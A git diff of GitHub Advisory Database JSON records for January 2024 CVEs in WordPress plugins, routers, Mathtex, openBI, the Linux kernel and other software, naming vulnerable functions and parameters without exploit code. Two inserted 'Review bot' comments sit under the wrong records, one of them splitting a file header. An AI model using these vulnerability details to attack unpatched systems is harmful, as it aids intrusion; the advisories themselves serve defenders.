"2024-01-29T20:15:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-55jq-jhw2-2vmp/GHSA-55jq-jhw2-2vmp.json b/advisories/unreviewed/2024/01/GHSA-55jq-jhw2-2vmp/GHSA-55jq-jhw2-2vmp.json new file mode 100644 index 0000000000000..172863dba999c --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-55jq-jhw2-2vmp/GHSA-55jq-jhw2-2vmp.json 
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-55jq-jhw2-2vmp",
+ "modified": "2024-02-06T18:30:20Z",
+ "published": "2024-01-31T21:31:03Z",
+ "aliases": [
+ "CVE-2024-22159"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in realmag777 WOLF – WordPress Posts Bulk Editor and Manager Professional allows Reflected XSS.This issue affects WOLF – WordPress Posts Bulk Editor and Manager Professional: from n/a through 1.0.8.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22159"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/vulnerability/bulk-editor/wordpress-wolf-wordpress-posts-bulk-editor-and-manager-professional-plugin-1-0-8-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-31T19:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-567x-h4g5-2gwq/GHSA-567x-h4g5-2gwq.json b/advisories/unreviewed/2024/01/GHSA-567x-h4g5-2gwq/GHSA-567x-h4g5-2gwq.json
index 97a2c40b4a8f7..750b5c55b9f7f 100644
--- a/advisories/unreviewed/2024/01/GHSA-567x-h4g5-2gwq/GHSA-567x-h4g5-2gwq.json
+++ b/advisories/unreviewed/2024/01/GHSA-567x-h4g5-2gwq/GHSA-567x-h4g5-2gwq.json
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-567x-h4g5-2gwq", - "modified": "2024-01-24T18:31:01Z", + "modified": "2024-02-05T15:30:23Z", "published": "2024-01-24T18:31:01Z", "aliases": [ "CVE-2023-51890" ], "details": "An infinite loop issue discovered in Mathtex 1.05 and before allows a remote attackers to consume CPU resources via crafted string in the application URL.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-835" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T18:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-57w7-wm2r-3f6f/GHSA-57w7-wm2r-3f6f.json b/advisories/unreviewed/2024/01/GHSA-57w7-wm2r-3f6f/GHSA-57w7-wm2r-3f6f.json index 4d26ae3a0a099..5cfb7cf21bdff 100644 --- a/advisories/unreviewed/2024/01/GHSA-57w7-wm2r-3f6f/GHSA-57w7-wm2r-3f6f.json +++ b/advisories/unreviewed/2024/01/GHSA-57w7-wm2r-3f6f/GHSA-57w7-wm2r-3f6f.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-57w7-wm2r-3f6f", - "modified": "2024-01-24T18:31:01Z", + "modified": "2024-02-05T15:30:23Z", "published": "2024-01-24T18:31:01Z", "aliases": [ "CVE-2023-51889" ], "details": "Stack Overflow vulnerability in the validate() function in Mathtex v.1.05 and before allows a remote attacker to execute arbitrary code via crafted string in the application URL.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-787" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T18:15:08Z" 
diff --git a/advisories/unreviewed/2024/01/GHSA-595j-mfvm-f4gx/GHSA-595j-mfvm-f4gx.json b/advisories/unreviewed/2024/01/GHSA-595j-mfvm-f4gx/GHSA-595j-mfvm-f4gx.json index 0b9b652f716e6..1b5ba017a35f2 100644 --- a/advisories/unreviewed/2024/01/GHSA-595j-mfvm-f4gx/GHSA-595j-mfvm-f4gx.json +++ b/advisories/unreviewed/2024/01/GHSA-595j-mfvm-f4gx/GHSA-595j-mfvm-f4gx.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-595j-mfvm-f4gx", - "modified": "2024-01-26T00:30:26Z", + "modified": "2024-02-01T00:31:28Z", "published": "2024-01-26T00:30:26Z", "aliases": [ "CVE-2023-51833" ], "details": "A command injection issue in TRENDnet TEW-411BRPplus v.2.07_eu that allows a local attacker to execute arbitrary code via the data1 parameter in the debug.cgi page.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-77" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-25T22:15:07Z" diff --git a/advisories/unreviewed/2024/01/GHSA-597m-g6ch-mrf9/GHSA-597m-g6ch-mrf9.json b/advisories/unreviewed/2024/01/GHSA-597m-g6ch-mrf9/GHSA-597m-g6ch-mrf9.json new file mode 100644 index 0000000000000..c63120cac668a --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-597m-g6ch-mrf9/GHSA-597m-g6ch-mrf9.json 
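Review bot: The `details` text says the `debug.cgi` command injection `allows a local attacker`, but the vector added in this hunk, `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H`, scores it as reachable over the network, so the record contradicts itself. A CGI endpoint on a router is presumably exercised through its web interface, which would make `AV:N` the plausible reading and the "local attacker" wording the part to verify against the advisory's references; if the wording is right, the vector and the derived `"severity": "HIGH"` overstate exposure. The discrepancy should be settled before the record leaves `unreviewed`.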
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-597m-g6ch-mrf9",
+ "modified": "2024-01-30T15:30:22Z",
+ "published": "2024-01-30T15:30:22Z",
+ "aliases": [
+ "CVE-2024-0676"
+ ],
+ "details": "Weak password requirement vulnerability \n\nin Lamassu Bitcoin ATM Douro machines, in its 7.1 version\n\n, which allows a local user to interact with the machine where the application is installed, retrieve stored hashes from the machine and crack long 4-character passwords using a dictionary attack.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:P/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0676"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-lamassu-bitcoin-atm-douro-machines"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-521"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-30T13:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-5g36-x562-44f9/GHSA-5g36-x562-44f9.json b/advisories/unreviewed/2024/01/GHSA-5g36-x562-44f9/GHSA-5g36-x562-44f9.json
index 4831bb25b798b..c3245768ecbba 100644
--- a/advisories/unreviewed/2024/01/GHSA-5g36-x562-44f9/GHSA-5g36-x562-44f9.json
+++ b/advisories/unreviewed/2024/01/GHSA-5g36-x562-44f9/GHSA-5g36-x562-44f9.json
@@ -28,6 +28,10 @@
 {
 "type": "WEB",
 "url": "https://github.com/rear/rear/pull/3123"
+ },
+ {
+ "type": "WEB",
+ "url": "https://lists.debian.org/debian-lts-announce/2024/02/msg00003.html"
 }
 ],
 "database_specific": {
diff --git a/advisories/unreviewed/2024/01/GHSA-5g3r-g2mw-w853/GHSA-5g3r-g2mw-w853.json b/advisories/unreviewed/2024/01/GHSA-5g3r-g2mw-w853/GHSA-5g3r-g2mw-w853.json
index 427ae3d352c45..3d157e8dd6500 100644
--- a/advisories/unreviewed/2024/01/GHSA-5g3r-g2mw-w853/GHSA-5g3r-g2mw-w853.json
+++ b/advisories/unreviewed/2024/01/GHSA-5g3r-g2mw-w853/GHSA-5g3r-g2mw-w853.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-5g3r-g2mw-w853", - "modified": "2024-01-26T09:30:22Z", + "modified": "2024-01-30T00:30:29Z", "published": "2024-01-26T09:30:22Z", "aliases": [ "CVE-2023-48128" ], "details": "An issue in UNITED BOXING GYM mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + } ], "affected": [ @@ -27,7 +30,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-26T07:15:57Z" diff --git a/advisories/unreviewed/2024/01/GHSA-5gr6-jf2g-hh79/GHSA-5gr6-jf2g-hh79.json b/advisories/unreviewed/2024/01/GHSA-5gr6-jf2g-hh79/GHSA-5gr6-jf2g-hh79.json new file mode 100644 index 0000000000000..ec7f3e21424f9 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-5gr6-jf2g-hh79/GHSA-5gr6-jf2g-hh79.json 
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-5gr6-jf2g-hh79",
+ "modified": "2024-01-31T18:31:25Z",
+ "published": "2024-01-31T18:31:25Z",
+ "aliases": [
+ "CVE-2024-0833"
+ ],
+ "details": "In Telerik Test Studio versions prior to \n\nv2023.3.1330, a privilege elevation vulnerability has been identified in the applications installer component.  In an environment where an existing Telerik Test Studio install is present, a lower privileged user has the ability to manipulate the installation package to elevate their privileges on the underlying operating system.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0833"
+ },
+ {
+ "type": "WEB",
+ "url": "https://docs.telerik.com/teststudio/knowledge-base/product-notices-kb/legacy-installer-vulnerability"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.telerik.com/teststudio"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-269"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-31T16:15:46Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-5h2x-6j9f-vr5g/GHSA-5h2x-6j9f-vr5g.json b/advisories/unreviewed/2024/01/GHSA-5h2x-6j9f-vr5g/GHSA-5h2x-6j9f-vr5g.json
new file mode 100644
index 0000000000000..aa101c09dd2a5
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-5h2x-6j9f-vr5g/GHSA-5h2x-6j9f-vr5g.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-5h2x-6j9f-vr5g",
+ "modified": "2024-01-31T21:31:03Z",
+ "published": "2024-01-31T21:31:03Z",
+ "aliases": [
+ "CVE-2024-1113"
+ ],
+ "details": "A vulnerability, which was classified as critical, was found in openBI up to 1.0.8. This affects the function uploadUnity of the file /application/index/controller/Unity.php. The manipulation of the argument file leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252471.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1113"
+ },
+ {
+ "type": "WEB",
+ "url": "https://note.zhaoj.in/share/hPSx8li8LFfJ"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.252471"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.252471"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-434"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-31T20:15:45Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-5jgq-vcw8-3624/GHSA-5jgq-vcw8-3624.json b/advisories/unreviewed/2024/01/GHSA-5jgq-vcw8-3624/GHSA-5jgq-vcw8-3624.json
new file mode 100644
index 0000000000000..f7d8bd6c7a323
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-5jgq-vcw8-3624/GHSA-5jgq-vcw8-3624.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-5jgq-vcw8-3624",
+ "modified": "2024-01-29T15:30:26Z",
+ "published": "2024-01-29T15:30:26Z",
+ "aliases": [
+ "CVE-2024-0997"
+ ],
+ "details": "A vulnerability was found in Totolink N200RE 9.3.5u.6139_B20201216 and classified as critical. Affected by this issue is the function setOpModeCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument pppoeUser leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252266 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0997"
+ },
+ {
+ "type": "WEB",
+ "url": "https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setOpModeCfg-9faac02b13d84bd3b7fe84aab68c7add?pvs=4"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.252266"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.252266"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-121"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-29T13:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-5m9g-m2vj-47r4/GHSA-5m9g-m2vj-47r4.json b/advisories/unreviewed/2024/01/GHSA-5m9g-m2vj-47r4/GHSA-5m9g-m2vj-47r4.json
new file mode 100644
index 0000000000000..0ad115e45e815
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-5m9g-m2vj-47r4/GHSA-5m9g-m2vj-47r4.json
@@ -0,0 +1,54 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-5m9g-m2vj-47r4",
+ "modified": "2024-01-30T15:30:22Z",
+ "published": "2024-01-30T15:30:22Z",
+ "aliases": [
+ "CVE-2024-0564"
+ ],
+ "details": "A flaw was found in the Linux kernel's memory deduplication mechanism. The max page sharing of Kernel Samepage Merging (KSM), added in Linux kernel version 4.4.0-96.119, can create a side channel. When the attacker and the victim share the same host and the default setting of KSM is \"max page sharing=256\", it is possible for the attacker to time the unmap to merge with the victim's page. The unmapping time depends on whether it merges with the victim's page and additional physical pages are created beyond the KSM's \"max page share\". Through these operations, the attacker can leak the victim's page.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0564"
+ },
+ {
+ "type": "WEB",
+ "url": "https://access.redhat.com/security/cve/CVE-2024-0564"
+ },
+ {
+ "type": "WEB",
+ "url": "https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1680513"
+ },
+ {
+ "type": "WEB",
+ "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258514"
+ },
+ {
+ "type": "WEB",
+ "url": "https://link.springer.com/conference/wisa"
+ },
+ {
+ "type": "WEB",
+ "url": "https://wisa.or.kr/accepted"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-203"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-30T15:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-5mh9-hrrq-46qr/GHSA-5mh9-hrrq-46qr.json b/advisories/unreviewed/2024/01/GHSA-5mh9-hrrq-46qr/GHSA-5mh9-hrrq-46qr.json
new file mode 100644
index 0000000000000..525427be673fd
--- /dev/null
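Review bot: Two of the new `references`, `https://link.springer.com/conference/wisa` and `https://wisa.or.kr/accepted`, point at a conference landing page and an acceptance list rather than the paper that describes the KSM timing side channel, so a reader cannot locate the research from this record; they should be replaced by, or supplemented with, a link to the actual paper if one exists. The `details` text dates the max-page-sharing behaviour to `4.4.0-96.119`, which looks like a distribution package version (the `bugs.launchpad.net/ubuntu` reference points the same way) rather than an upstream kernel release, so when `affected` is populated the introduced version will need translating to the upstream tree. The `S:C` with `AV:A` in the vector is the cross-tenant scope that operators of shared hosts care about and is the one thing worth spelling out when the record is reviewed.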
+++ b/advisories/unreviewed/2024/01/GHSA-5mh9-hrrq-46qr/GHSA-5mh9-hrrq-46qr.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-5mh9-hrrq-46qr",
+ "modified": "2024-01-30T15:30:22Z",
+ "published": "2024-01-30T15:30:22Z",
+ "aliases": [
+ "CVE-2024-1032"
+ ],
+ "details": "A vulnerability classified as critical was found in openBI up to 1.0.8. Affected by this vulnerability is the function testConnection of the file /application/index/controller/Databasesource.php of the component Test Connection Handler. The manipulation leads to deserialization. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252307.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1032"
+ },
+ {
+ "type": "WEB",
+ "url": "https://note.zhaoj.in/share/6ISYe2urjlkI"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.252307"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.252307"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-502"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-30T14:15:47Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-5mwr-c944-45q4/GHSA-5mwr-c944-45q4.json b/advisories/unreviewed/2024/01/GHSA-5mwr-c944-45q4/GHSA-5mwr-c944-45q4.json
new file mode 100644
index 0000000000000..e0448f2bb2a27
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-5mwr-c944-45q4/GHSA-5mwr-c944-45q4.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-5mwr-c944-45q4",
+ "modified": "2024-02-08T18:30:39Z",
+ "published": "2024-01-31T12:30:17Z",
+ "aliases": [
+ "CVE-2024-22287"
+ ],
+ "details": "Cross-Site Request Forgery (CSRF) vulnerability in Luděk Melichar Better Anchor Links allows Cross-Site Scripting (XSS).This issue affects Better Anchor Links: from n/a through 1.7.5.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22287"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/vulnerability/better-anchor-links/wordpress-better-anchor-links-plugin-1-7-5-csrf-to-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-352"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-31T12:16:05Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-5pp3-xch3-9qv7/GHSA-5pp3-xch3-9qv7.json b/advisories/unreviewed/2024/01/GHSA-5pp3-xch3-9qv7/GHSA-5pp3-xch3-9qv7.json
new file mode 100644
index 0000000000000..8b31756e77b0b
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-5pp3-xch3-9qv7/GHSA-5pp3-xch3-9qv7.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-5pp3-xch3-9qv7",
+ "modified": "2024-02-02T03:30:31Z",
+ "published": "2024-01-29T15:30:29Z",
+ "aliases": [
+ "CVE-2024-22559"
+ ],
+ "details": "LightCMS v2.0 is vulnerable to Cross Site Scripting (XSS) in the Content Management - Articles field.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22559"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/eddy8/LightCMS/issues/34"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-29T14:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-5prg-h6vm-wxcf/GHSA-5prg-h6vm-wxcf.json b/advisories/unreviewed/2024/01/GHSA-5prg-h6vm-wxcf/GHSA-5prg-h6vm-wxcf.json
index 018d8a42e0257..791b31d3f641e 100644
--- a/advisories/unreviewed/2024/01/GHSA-5prg-h6vm-wxcf/GHSA-5prg-h6vm-wxcf.json
+++ b/advisories/unreviewed/2024/01/GHSA-5prg-h6vm-wxcf/GHSA-5prg-h6vm-wxcf.json
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-5prg-h6vm-wxcf", - "modified": "2024-01-23T21:30:20Z", + "modified": "2024-01-29T18:31:47Z", "published": "2024-01-23T21:30:20Z", "aliases": [ "CVE-2023-38626" ], "details": "A post-authenticated server-side request forgery (SSRF) vulnerability in Trend Micro Apex Central 2019 (lower than build 6481) could allow an attacker to interact with internal or local services directly.\n\nPlease note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThis is a similar, but not identical vulnerability as CVE-2023-38625.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-918" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-5q2h-m2hm-4r3w/GHSA-5q2h-m2hm-4r3w.json b/advisories/unreviewed/2024/01/GHSA-5q2h-m2hm-4r3w/GHSA-5q2h-m2hm-4r3w.json index 350bbcb0548de..2c2c73e818e4c 100644 --- a/advisories/unreviewed/2024/01/GHSA-5q2h-m2hm-4r3w/GHSA-5q2h-m2hm-4r3w.json +++ b/advisories/unreviewed/2024/01/GHSA-5q2h-m2hm-4r3w/GHSA-5q2h-m2hm-4r3w.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-5q2h-m2hm-4r3w", - "modified": "2024-01-24T18:31:01Z", + "modified": "2024-02-05T18:31:36Z", "published": "2024-01-24T18:31:01Z", "aliases": [ "CVE-2023-51886" ], "details": "Buffer Overflow vulnerability in the main() function in Mathtex 1.05 and before allows a remote attacker to cause a denial of service when using \\convertpath.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ 
@@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-120" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T17:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-5qv8-mq82-vgm3/GHSA-5qv8-mq82-vgm3.json b/advisories/unreviewed/2024/01/GHSA-5qv8-mq82-vgm3/GHSA-5qv8-mq82-vgm3.json index b5312ec3604d6..b83d9bbd52ced 100644 --- a/advisories/unreviewed/2024/01/GHSA-5qv8-mq82-vgm3/GHSA-5qv8-mq82-vgm3.json +++ b/advisories/unreviewed/2024/01/GHSA-5qv8-mq82-vgm3/GHSA-5qv8-mq82-vgm3.json @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20967" }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240201-0003/" + }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2024.html" diff --git a/advisories/unreviewed/2024/01/GHSA-5rh9-65g2-hc9h/GHSA-5rh9-65g2-hc9h.json b/advisories/unreviewed/2024/01/GHSA-5rh9-65g2-hc9h/GHSA-5rh9-65g2-hc9h.json index fef7806b1e04d..bedb87e3bf834 100644 --- a/advisories/unreviewed/2024/01/GHSA-5rh9-65g2-hc9h/GHSA-5rh9-65g2-hc9h.json +++ b/advisories/unreviewed/2024/01/GHSA-5rh9-65g2-hc9h/GHSA-5rh9-65g2-hc9h.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-5rh9-65g2-hc9h", - "modified": "2024-01-23T15:30:58Z", + "modified": "2024-01-29T18:31:47Z", "published": "2024-01-23T15:30:58Z", "aliases": [ "CVE-2024-22663" ], "details": "TOTOLINK_A3700R_V9.1.2u.6165_20211012has a command Injection vulnerability via setOpModeCfg", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-77" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T15:15:11Z" 
diff --git a/advisories/unreviewed/2024/01/GHSA-5rh9-jc57-95mr/GHSA-5rh9-jc57-95mr.json b/advisories/unreviewed/2024/01/GHSA-5rh9-jc57-95mr/GHSA-5rh9-jc57-95mr.json
new file mode 100644
index 0000000000000..68f200aeb00b0
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-5rh9-jc57-95mr/GHSA-5rh9-jc57-95mr.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-5rh9-jc57-95mr",
+ "modified": "2024-02-08T03:32:45Z",
+ "published": "2024-01-31T21:31:03Z",
+ "aliases": [
+ "CVE-2024-21917"
+ ],
+ "details": "\nA vulnerability exists in Rockwell Automation FactoryTalk® Service Platform that allows a malicious user to obtain the service token and use it for authentication on another FTSP directory. This is due to the lack of digital signing between the FTSP service token and directory.  If exploited, a malicious user could potentially retrieve user information and modify settings without any authentication.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21917"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.rockwellautomation.com/en-us/support/advisory.SD1660.html"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-347"
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-31T19:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-5rr9-mqhj-7cr2/GHSA-5rr9-mqhj-7cr2.json b/advisories/unreviewed/2024/01/GHSA-5rr9-mqhj-7cr2/GHSA-5rr9-mqhj-7cr2.json
new file mode 100644
